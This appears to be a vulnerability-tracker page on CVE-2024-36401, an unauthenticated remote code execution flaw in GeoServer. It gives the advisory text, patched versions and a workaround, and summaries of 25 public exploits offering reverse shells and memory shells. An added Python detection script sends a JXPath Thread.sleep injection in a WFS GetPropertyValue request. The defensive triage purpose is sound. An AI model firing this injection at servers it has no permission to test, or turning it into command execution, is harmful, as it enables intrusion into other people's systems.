Geoserver unauthenticated Remote Code Execution
Title source: metasploit
Exploitation Summary
CVE-2024-36401 is actively exploited and listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, added July 15, 2024.
EIP tracks 25 public exploits from researchers including whitebear-ch, Chocapikk and Mr-xn, as well as a Metasploit module, exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.
A Nuclei detection template is also available.
AI-analyzed exploit summary
The repository lacks actual exploit code and only contains a README with vague descriptions and external links. It appears to be a social engineering lure rather than a legitimate PoC.
Description
GeoServer is an open source server that allows users to share and edit geospatial data. Prior to versions 2.22.6, 2.23.6, 2.24.4, and 2.25.2, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation, because property names are unsafely evaluated as XPath expressions.

The GeoTools library API that GeoServer calls evaluates property/attribute names for feature types in a way that unsafely passes them to the commons-jxpath library, which can execute arbitrary code when evaluating XPath expressions. This XPath evaluation is intended to be used only by complex feature types (i.e., Application Schema data stores) but is incorrectly applied to simple feature types as well, which makes this vulnerability apply to **ALL** GeoServer instances.

At the time the advisory was published no public PoC had been provided, but the vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests, and it can lead to executing arbitrary code.

Versions 2.22.6, 2.23.6, 2.24.4, and 2.25.2 contain a patch for the issue. A workaround exists by removing the `gt-complex-x.y.jar` file from the GeoServer installation, where `x.y` is the GeoTools version (e.g., `gt-complex-31.1.jar` if running GeoServer 2.25.1). This removes the vulnerable code from GeoServer but may break some GeoServer functionality, or prevent GeoServer from deploying if the gt-complex module is needed.
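The following triage helper is an added example, not code from this page, from GeoServer or from GeoTools. It turns the facts in the description into three checks a defender can run: a version comparison against the fixed releases listed above, extraction of typeNames from a WFS GetCapabilities document (a GetPropertyValue request has to name a real feature type), and a non-destructive probe that puts a JXPath extension-function call, `java.lang.Thread.sleep(...)`, where the WFS GetPropertyValue `valueReference` property name belongs, so a vulnerable server reveals itself by latency rather than by executing a shell command. Assumptions: the function names (`is_patched`, `parse_type_names`, `build_probe_url`, `probe_delay`) are this example's own, the WFS 2.0.0 GET parameter names are the standard ones, and the layer names in `SAMPLE_CAPABILITIES` are a constructed sample, not data from any real server.

```python
"""Added triage helper for CVE-2024-36401 (example code, not from the page or from
GeoServer/GeoTools). Pure functions do the work; probe_delay() alone touches the network."""
import socket
import sys
import time
import urllib.error
import urllib.parse
import urllib.request
import xml.etree.ElementTree as ET

# First fixed release per maintained branch, from the advisory text. Branches older
# than 2.22 never received a fix; branches newer than 2.25 were released after it.
FIXED = {(2, 22): (2, 22, 6), (2, 23): (2, 23, 6), (2, 24): (2, 24, 4), (2, 25): (2, 25, 2)}

# Constructed sample of a WFS 2.0 GetCapabilities fragment; layer names are made up.
SAMPLE_CAPABILITIES = """<wfs:WFS_Capabilities version="2.0.0"
    xmlns="http://www.opengis.net/wfs/2.0" xmlns:wfs="http://www.opengis.net/wfs/2.0">
  <FeatureTypeList>
    <FeatureType><Name>sf:archsites</Name><Title>Spearfish archeological sites</Title></FeatureType>
    <FeatureType><Name>topp:states</Name><Title>USA Population</Title></FeatureType>
  </FeatureTypeList>
</wfs:WFS_Capabilities>"""


def parse_version(version: str) -> tuple:
    """'2.25.1-SNAPSHOT' -> (2, 25, 1); missing components count as 0."""
    parts = [int(p) for p in version.strip().split("-")[0].split(".")[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def is_patched(version: str) -> bool:
    """True when the version is at or past the fixed release for its branch."""
    v = parse_version(version)
    branch = v[:2]
    if branch in FIXED:
        return v >= FIXED[branch]
    return branch > (2, 25)


def _local(tag: str) -> str:
    return tag.rsplit("}", 1)[-1]  # strip the {namespace} prefix ElementTree adds


def parse_type_names(capabilities_xml: str) -> list:
    """Collect FeatureType/Name values whether or not the elements carry a prefix."""
    names = []
    for ft in ET.fromstring(capabilities_xml).iter():
        if _local(ft.tag) == "FeatureType":
            names += [c.text.strip() for c in ft if _local(c.tag) == "Name" and c.text]
    return names


def build_probe_url(base_url: str, type_name: str, seconds: int) -> str:
    """GET form of a WFS 2.0.0 GetPropertyValue. valueReference is not a property
    name but a JXPath extension-function call: a vulnerable server evaluates it and
    blocks for `seconds`; a patched one rejects the request without delay."""
    query = urllib.parse.urlencode({
        "service": "WFS",
        "version": "2.0.0",
        "request": "GetPropertyValue",
        "typeNames": type_name,
        "valueReference": f"java.lang.Thread.sleep({seconds * 1000})",
    })
    return f"{base_url.rstrip('/')}/wfs?{query}"


def looks_vulnerable(elapsed_s: float, baseline_s: float, seconds: int) -> bool:
    """Flag only if the added latency is at least 80% of the requested sleep, so a
    slow but patched server is not reported as positive."""
    return elapsed_s - baseline_s >= 0.8 * seconds


def _timed_get(url: str, timeout: float):
    """Elapsed seconds for one request, or None if it timed out (inconclusive)."""
    start = time.monotonic()
    try:
        urllib.request.urlopen(url, timeout=timeout).read()
    except (socket.timeout, urllib.error.URLError) as exc:
        if isinstance(exc, socket.timeout) or isinstance(getattr(exc, "reason", None), socket.timeout):
            return None
        # HTTPError (4xx/5xx) is expected for a bogus property; only the timing matters
    return time.monotonic() - start


def probe_delay(base_url: str, type_name: str, seconds: int = 5) -> dict:
    """Time a zero-sleep control request, then the real probe, against one type name."""
    timeout = seconds * 3.0  # a timeout must never be mistaken for the sleep itself
    baseline = _timed_get(build_probe_url(base_url, type_name, 0), timeout)
    elapsed = _timed_get(build_probe_url(base_url, type_name, seconds), timeout)
    verdict = None if baseline is None or elapsed is None else looks_vulnerable(elapsed, baseline, seconds)
    return {"type_name": type_name, "baseline_s": baseline, "elapsed_s": elapsed, "vulnerable": verdict}


if __name__ == "__main__":
    # usage: python cve_2024_36401_check.py http://host:8080/geoserver [reported-version]
    base = sys.argv[1].rstrip("/")
    if len(sys.argv) > 2:
        print("patched according to version string:", is_patched(sys.argv[2]))
    caps = urllib.request.urlopen(base + "/wfs?service=WFS&version=2.0.0&request=GetCapabilities", timeout=30).read()
    names = parse_type_names(caps.decode("utf-8", "replace"))
    if not names:
        sys.exit("no feature types advertised; cannot build a GetPropertyValue probe")
    print(probe_delay(base, names[0]))
```

The probe deliberately uses Thread.sleep rather than an `exec()` call: it exercises the same unsafe JXPath evaluation the description attributes to commons-jxpath but leaves no process or file on the target. Latency probes are noisy on slow links, which is why a zero-sleep control request on the same code path is timed first and a timeout is reported as inconclusive rather than as a hit. GetPropertyValue is only one of the six request types the description lists as exploitable; a server that blocks that endpoint at a proxy is not thereby patched.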
Exploits (25)
The repository lacks actual exploit code and only contains a README with vague descriptions and external links. It appears to be a social engineering lure rather than a legitimate PoC.
This repository contains a functional exploit for CVE-2024-36401, targeting GeoServer versions with an XPath injection vulnerability leading to unauthenticated RCE. The exploit includes version detection, payload construction, and reverse shell capabilities.
This repository provides functional exploit code for CVE-2024-36401, demonstrating Remote Code Execution (RCE) in GeoServer via unsafely evaluated XPath expressions in property names. Multiple OGC request parameters (WFS, WMS, WPS) are shown with crafted payloads to execute arbitrary commands.
This repository contains a functional exploit for CVE-2024-36401, targeting GeoServer's WFS service. The exploit leverages OGNL injection via crafted XML payloads to achieve remote code execution (RCE), including reverse shell and memory shell injection capabilities.
This repository contains a functional exploit tool for CVE-2024-36401, targeting GeoServer with multiple attack vectors including DNS log probing, Jetty echo, and memory shell injection. The tool provides a GUI interface for executing these attacks and includes utilities for payload generation and attack execution.
This repository contains a functional Python-based exploit for CVE-2024-36401, targeting GeoServer versions prior to 2.25.1, 2.24.3, and 2.23.5. The exploit sends a crafted WFS request to execute a reverse shell payload, assuming the presence of 'nc' on the target system.
This repository contains a functional exploit for CVE-2024-36401, targeting GeoServer instances via a crafted WFS request to achieve remote code execution (RCE). The exploit automates the discovery of feature types and sends payloads to trigger the vulnerability, logging successful exploitations via a server component.
This repository contains a functional exploit for CVE-2024-36401, a remote code execution vulnerability in GeoServer. The exploit leverages a crafted XML payload to execute arbitrary commands via the `exec` function in the `valueReference` attribute of a WFS GetPropertyValue request.
This repository contains a functional exploit for CVE-2024-36401, targeting GeoServer versions prior to 2.23.6, 2.24.4, or 2.25.2. The exploit leverages a remote code execution (RCE) vulnerability via crafted WFS requests to execute arbitrary commands, including downloading and running a Meterpreter payload.
This repository contains a functional exploit for CVE-2024-36401, targeting GeoServer's WFS service. The exploit leverages XML injection to execute arbitrary commands, resulting in a reverse shell.
This repository contains a functional exploit for CVE-2024-36401, a remote command execution vulnerability in GeoServer. The exploit leverages a crafted WFS (Web Feature Service) request to execute arbitrary commands on the target system, supporting both direct command execution and reverse shell modes.
This repository contains a functional Python-based PoC for CVE-2024-36401, a remote code execution vulnerability in GeoServer. The exploit automates the extraction of Typenames and tests them for command execution via crafted requests to the GeoServer WFS interface.
The repository provides a functional exploit for CVE-2024-36401, demonstrating Remote Code Execution (RCE) in GeoServer via crafted WFS GetPropertyValue requests. The exploit leverages property name expression evaluation to execute arbitrary commands.
The repository claims to be an exploit for CVE-2024-36401 (GeoServer RCE) but lacks actual exploit code. Instead, it relies on external API calls to 'api.cvssadvisor.com' for SSRF-based detection, which is unrelated to the stated CVE. The README is vague and focuses on tool features rather than technical details of the vulnerability.
This repository contains a functional exploit for CVE-2024-36401, an unauthenticated RCE vulnerability in GeoServer/GeoTools. The exploit leverages JXPath extension functions in OGC endpoints (e.g., WFS GetPropertyValue) to execute arbitrary Java code, demonstrated via Thread.sleep delays and file creation (touch).
This repository contains a functional exploit for CVE-2024-36401, an unauthenticated remote code execution vulnerability in GeoServer due to OGC XPath injection. The exploit crafts malicious XML payloads to execute arbitrary commands via the `exec()` function in JXPath, supporting reverse shell and command execution.
This repository contains a functional exploit for CVE-2024-36401, targeting GeoServer's WFS service. The exploit leverages a Java deserialization vulnerability to achieve remote code execution via crafted XML payloads.
This repository contains a functional exploit for CVE-2024-36401, targeting GeoServer's Property Expression Injection RCE vulnerability. It includes both detection (PoC) and exploitation capabilities, with support for custom memory shell injection and command execution.
This repository contains a functional exploit for CVE-2024-36401, targeting GeoServer's WFS service. The exploit sends a crafted XML payload to execute arbitrary commands via Java runtime, establishing a reverse shell to the attacker's specified IP and port.
This repository contains a functional Python exploit for CVE-2024-36401, which targets a vulnerability in a WFS (Web Feature Service) server to achieve remote code execution via crafted GetPropertyValue requests. The exploit encodes a reverse shell payload in Base64 and sends it to the target server using specific parameters.
The repository contains a detection script for CVE-2024-36401, which is an RCE vulnerability in GeoServer. The script sends a crafted XML payload to the target GeoServer instance and checks for an out-of-band (OOB) request to determine vulnerability.
This repository contains a functional exploit for CVE-2024-36401, targeting GeoServer's unsafe handling of XPath expressions via the commons-jxpath library, enabling remote code execution. The exploit includes WAF bypass techniques using XML comments and supports command execution, delayed detection, and memory shell injection.
This repository contains a functional exploit tool for CVE-2024-36401, targeting GeoServer with multiple exploit modules including RCE, memory injection, XXE, reverse shell, and file reading. The code includes detailed implementations for each exploit type, with a GUI interface for ease of use.
This repository contains a functional Python-based exploit for CVE-2024-36401, which targets a vulnerability in a WFS (Web Feature Service) server to achieve remote code execution (RCE) via crafted HTTP requests. The exploit uses Base64-encoded commands and a reverse shell payload to gain control over the target system.
This Metasploit module exploits CVE-2024-36401, an unauthenticated RCE vulnerability in GeoServer versions < 2.23.6, >= 2.24.0 < 2.24.4, and >= 2.25.0 < 2.25.1. It abuses unsafely evaluated XPath expressions in OGC request parameters to execute arbitrary commands.
Nuclei Templates (1)
Server: GeoHttpServer
title="geoserver" || app="geoserver"
References (7)
Scores
CVSS 3.1 base score 9.8 (Critical): CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H